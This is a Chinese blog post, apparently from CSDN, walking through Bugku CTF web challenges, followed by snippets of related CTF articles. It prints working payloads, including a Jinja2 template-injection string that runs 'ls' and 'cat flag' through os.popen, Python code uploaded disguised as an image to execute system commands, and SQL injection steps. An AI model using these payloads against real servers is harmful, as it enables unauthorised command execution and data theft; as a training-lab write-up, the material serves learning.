bugku.ctf ---WEB(还有后续)

已于 2024-08-01 21:34:22 修改
阅读量1.4k 收藏 14
点赞数 60
文章标签: 安全 python web安全
于 2024-08-01 13:31:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63988455/article/details/140800494
版权

bugku.ctf ---WEB

1.Simple_SSTI_1

1.启动场景

2. 页面说你需要输入一个名为flag的参数。

3.查看网页源代码,提示在flask中,设置了secret_key。意思是在注入模板中输入内容就会显示对应的值。

4.传入?flag={{config.SECRET_KEY}}显示flag

 2.Simple_SSTI_2

魔术对象:

__class__:返回类型所属的对象

__mro__:返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。

__base__"返回该对象所继承的基类          // __base__和__mro__都是用来寻找基类的

__subclasses__:获取当前类的所有子类

__init__ :类的初始化方法

__globals__:对包含(保存)函数全局变量的字典的引用

os.popen():

__globals__[‘os’].popen(‘ls’,‘r’).read()

1.启动好环境之后 依旧是服务端模板注入,查看源代码没有可利用的信息

2.http://114.67.175.224:19941/?flag={{config}}

3.使用ls查看有哪些文件:

?flag={{config.__class__.__init__.__globals__['os'].popen('ls','r').read()}}

4.发现了flag文件,直接cat查看?flag={{config.__class__.__init__.__globals__['os'].popen('cat flag','r').read()}}

3.Flask_FileUpload

新建txt,输入: import os os.system('ls /') 保存为a.png,然后上传,发现根目录下有个flag, 然后在修改txt内容为: import os os.system('cat /flag') 保存后,再上传,在新页面中查看源码,得到flag      ***因为python执行系统命令需要os这个库***

源码限制了白名单为jpg、png 上传php失败了

查看源代码意思为:上传文件,我会返回python运行的结果 

上传一下jpg

使用os模块,并把后缀改为jpg上传抓包,发现jpg内的代码执行成功,但是没有显示flag,说明不在当前目录下。

import os

os.system('ls/')

查看根目录下的文件,发现flag位置。

 import os

os.system('cat /flag')

4.留言板

5.滑稽

1.启动环境后页面显示这个

2.查看页面源代码

6.计算器

计算题答案填进去就行了,但是发现有长度限制

F12发现输入框maxlength="1",意思是最大长度是1,改大一点提交

7.GET

代码告诉我们用get方式对what进行传参

?what=flag即可。

8.POST

用POST方式对what进行传参。

抓包 在repeater模块下右键,改变提交方式,Change request method

9.矛盾

$num=$_GET['num'];//GET方式获取参数
if(!is_numeric($num))//is_numeric()函数是判断是否为数字或者数字字符串,且有bool is_numeric ( mixed $var )
{
echo $num;
if($num==1)//矛盾既要是1又要不是数字
echo 'flag{**********}';
}

构造payload语句 num=1e

114.67.175.224:11529/?num=1e

10.alert

F12打开后查找到script中的一串编码,复制粘贴刀一个新建文本文档中,然后将文本文档后缀改为html,双击打开即可

burpsuite抓包

然后发送到重放模块

把这个复制粘贴到html10解码  XSS平台-XSS测试网站-仅用于安全免费测试 (xssaq.com)



11.你必须让他停下

ctrl+u 一直刷新 到10.jpg就会出现flag

或者burpsuite抓包,然后发送到重放器,发送几次就有flag了

starhei.zxy
关注
  • 60
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Bugku-web之成绩查询
weixin_42939822的博客
03-14 3473
今天是一道地地道道的sql注入题目,通过手动注入不仅可以加深对于sql语句的应用,也能够通过实战了解sql语句的运作,更好地体会到sql注入漏洞存在的潜在危害!!!ctf小白之旅继续前行!!!
第三课 web攻防-Bugku靶场-inspect-me
weixin_40114827的博客
12-25 754
第三课 web攻防-Bugku靶场-inspect-me
Bugku CTF-Web篇writeup 3-11
anlr2020的博客
07-14 1280
Flask_FileUpload 由题目名得知的信息,显然是个文件上传的题目,flask:一种pythonweb框架 首先Ctrl+U查看页面源代码,一般能看到题目提示 支持jpg,png格式的文件上传,绿色的英文提示意思是上传文件,它会解析python代码并返回运行结果,所以上传php木马的并不能成功 在txt文档中写一段py程序来调用系统命令 导入 os模块 pyhon的os模块包含了普通的系统操作功能,这里os.system('')执行了ls命令 因为上传有格式的限制,所以要重命
bugku-web-login2
weixin_46079186的博客
06-20 961
题目地址 提示:命令执行 打开是一个登入框,猜测是SQL注入。 登入一下发现可疑字符 base64 解密为 $sql="SELECT username,password FROM admin WHERE username='".$username."'"; if (!empty($row) && $row['password']===md5($password)){ } 审计这段小代码,发现可以输入不存在用户,从而登入成功。 命令:username=Venus'un
CTF-WEB(MISC)
just do it
05-02 1053
在winhex中,查找图片里面有没有隐藏别的文件,可以在search里面的find hex values里面输入目标文件格式的文件头查找,找到了说明图片隐藏了其他的文件,否则就是没有,一般找到另一种文件头的话,后续在遇到另外的文件头之前的部分应该都是该文件的所有内容。简单来说,Exif信息是镶嵌在 JPEG/TIFF 图像文件格式内的一组拍摄参数,需要注意的是EXIF信息是不支持png,webp等图片格式的(建议自己试的时候,现拍一张,把地理位置信息开启,这样得到的是完整的EXIF信息)
BUGKU_CTF WEB(1-10)writeUP
热门推荐
单核CPU的小朋友的博客
10-19 4万+
第一题:WEB2 右击查看查看源代码或者直接F12审查元素就可以看到flag值了。 第二题:计算器 右击审查元素,发现input表单里有一个maxlenth属性。将属性值调大,就可以输入计算结果,从而拿到flag。 当然burp抓包和自制表单也可以实现该功能。 第三题:WEB基础$_GET 可以通过查看给出源码直接传递GET参数。拿到flag 第四题:WEB基础$_POST 可以自己通过写一个...
网络安全最全CTF BugKu平台——Crypto篇刷题记录(后续更新)_抄错的字符 ctf
2401_84301389的博客
05-04 851
扔进AZdecrypt进行解码(工具下载太慢了)
CTF-练习平台部分writeup
hijack89的博客
04-03 4万+
CTF-练习平台writeupCTF-练习平台MISC滴答~滴看标题基本就知道是摩尔斯密码“.”、”-“,直接在线摩尔斯解密 聪明的小羊小羊。。。老套路 翻栅栏,栅栏密码。。。比较简单,直接看出来是两栏加密 KEY{sad23jjdsa2}这是一张单纯的图片??看题目估计是道隐写术的题,先保存图片的说; 30分的题,估计不会太难,直接文本编辑器打开;文本末尾发现了一行转义序列: 看来这
CTF web练习题
00勇士王子的博客
12-28 2378
CTF web每日一题 第一天:BUGKU Web13(2020.12.28) 打开题目环境 提示让看源码,于是直接F12查看源码: 发现一段js代码,里面p1和p2的值应该是url编码,用url解码试试: 得到一段代码。 var p1 = 'function checkSubmit(){var a=document.getElementById("password");if("undefined"!=typeof a){if("67d709b2b'; var p2 = 'aa648cf6e87a7
CTF Web学习(四)----SQL注入
网络猿的博客
01-11 1510
CTF Web学习(四) SQL注入 CTF Web学习目录链接 CTF Web学习(一):基础篇及头文件修改、隐藏 CTF Web学习(二):代码审计、burp suite应用 CTF Web学习(三):python脚本的编写及应用 文章目录CTF Web学习(四)前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。
(二)Xray-进阶使用方法
m0_52027565的博客
06-19 2522
Xray的进阶的使用方法 作为一个新接触信息安全专业的菜鸟,我又开始了叙述我的艰辛之路了(鹅鹅鹅)! 第一个入门链接先放这了 4. 关于Xray的代理问题(包括firefox ) 5. 配置Xray的扫描证书 6. 关于Xray的实战(包括网址推荐) 4.关于Xray的代理大致分为两大类。一类是使用Google的Blink浏览器内核,这类包括Google Chrome,Opera,Microsoft Edge,百度,搜狗等;另一类就是Firefox的Gecko了,众所周知火狐一向比较麻烦的 ~~(我认为
Web安全-文件包含
sixoneyvye的博客
04-17 463
一、了解文件包含 了解文件包含 什么是文件包含:为了更好地使用代码的重用性,引入了文件包含函数,通过文件包含函数将文件包含进来,直接使用包含文件的代码,简单点来说就是一个文件里面包含另外一个或多个文件。 漏洞成因:文件包含函数加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致了执行了非预期的代码。 PHP引发文件包含的四个函数 include() ...
【盖世汽车-注册安全分析报告】
09-02 1389
盖世汽车(上海盖世网络技术有限公司)是汽车产业专业的信息服务平台,为企业及行业人士提供一站式服务。
【精选】文件摆渡系统:跨网文件传输的安全与效率之选
文件数据安全交换
09-06 908
同时满足安全与效率兼顾的文件摆渡系统,那就是Ftrans飞驰云联的《Ftrans Ferry跨网文件安全交换系统》,这是一款由飞驰云联自主研发的安全产品,可以有效解决内外网间、多个网络之间、HPC环境下、云租户之间的跨网文件摆渡需求,通过多审核审批、日志审计、防病毒、DLP检测、传输加密、权限管控、传输加速等,实现统一的文件摆渡安全管控,提高网间数据交互效率。支持企业微信、钉钉等进行消息通知集成。系统内置DLP检测功能,可检测文件的大小、文件名、文件个数、文件来源、敏感内容、文件类型、是否含有病毒等。
高端控制台使用过程中如何保证用电安全
JiaDeLi_console的博客
09-03 485
因此,在使用过程中,采取有效措施确保用电安全,不仅关乎设备寿命,更直接关系到人身安全及数据安全。同时,增强员工的安全意识,让每个人都成为用电安全的守护者,共同营造一个安全、稳定的工作环境。在高端控制台的使用过程中,可以引入智能监控系统,实时监测电力参数、环境温度等关键指标,一旦发现异常立即报警,为及时处理问题提供有力支持。总之,高端控制台使用过程中的用电安全是一项系统工程,需要从电源布局、设备选型、日常维护、人员培训以及智能监控等多个方面入手,全方位、多角度地确保用电安全,为设备的稳定运行保驾护航。
网络安全售前入门09安全服务——安全加固服务
打工人
09-02 1319
安全加固服务是参照风险评估、等保测评、安全检查等工作的结果,基于科学的安全思维方式、长期的安全服务经验积累、对行业的深刻理解、处理安全事件的最佳实践,为客户提供完善的安全加固方案,并在客户侧反馈完成加固后,提供二次评估服务,从而帮助客户达到修补信息系统脆弱性,提高系统安全性,满足相关政策法规的目的。
一次性解决 | 网站被提示“不安全
最新发布
liushuai66888的博客
09-06 351
部署SSL证书:如果网站尚未部署SSL证书,需要购买或获取一个由权威证书颁发机构(CA)签发的SSL证书,并安装在服务器上。安装证书后,网站就是经过第三方CA验证过的,浏览器就会信任这类网站,也就不会在提示“不安全”。通过以上步骤,可以一次性解决网站被提示“不安全”的问题,提升网站的安全性,保护用户数据,并增强网站的品牌形象和用户信任度。如果自己不熟悉SSL证书的安装和配置,或者遇到难以解决的问题,建议联系专业的技术支持人员或网络安全专家来帮助解决。检查证书链:确保证书链完整,没有缺少必要的中间证书。
思科交换机端口安全配置1
2302_76730689的博客
09-02 1017
2配置交换机B的主机名称,创建vlan 10和vlan 20,将f0/1、2划入vlan 10,f0/3、4划入vlan 20,将f0/24配置为Trunk。#3配置交换机A的主机名称,创建vlan 10和vlan 20,并vlan 10和vlan 20 的SVI接口配置IP地址,并启用交换机的路由功能。#4在Switch-B上针对不同vlan 的主机配置端口安全
bugku ctf sqli-0x1题解
03-23
bugku ctf是一个CTF(Capture The Flag)比赛平台,提供各种类型的安全挑战题目供参赛者解答。sqli-0x1是其中一个SQL注入题目,下面是该题目的解题思路: 1. 题目描述:sqli-0x1是一个简单的SQL注入题目,要求获取数据库中的某个表的内容。 2. 分析注入点:首先,我们需要找到注入点。可以通过在输入框中输入一些特殊字符(如'、"、;等)来尝试触发SQL注入。如果页面返回异常或者显示不正常,那么很可能存在注入点。 3. 判断注入类型:确定注入点后,我们需要判断注入类型。可以通过在输入框中输入一些测试语句(如' or 1=1--)来判断是否存在注入漏洞。如果页面返回正常,那么很可能存在注入漏洞。 4. 获取数据库信息:一旦确认存在注入漏洞,我们可以通过构造合适的SQL语句来获取数据库信息。可以使用UNION SELECT语句来获取表的列数和列名,然后使用SELECT语句获取表的内容。 5. 构造SQL语句:根据题目要求,我们需要获取某个表的内容。可以使用如下语句来获取表的内容: SELECT column_name FROM information_schema.columns WHERE table_name='表名'; SELECT * FROM 表名; 6. 获取结果:根据构造的SQL语句,将其作为输入发送给服务器,获取返回的结果。根据返回的结果,我们可以得到表的列数、列名和表的内容。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值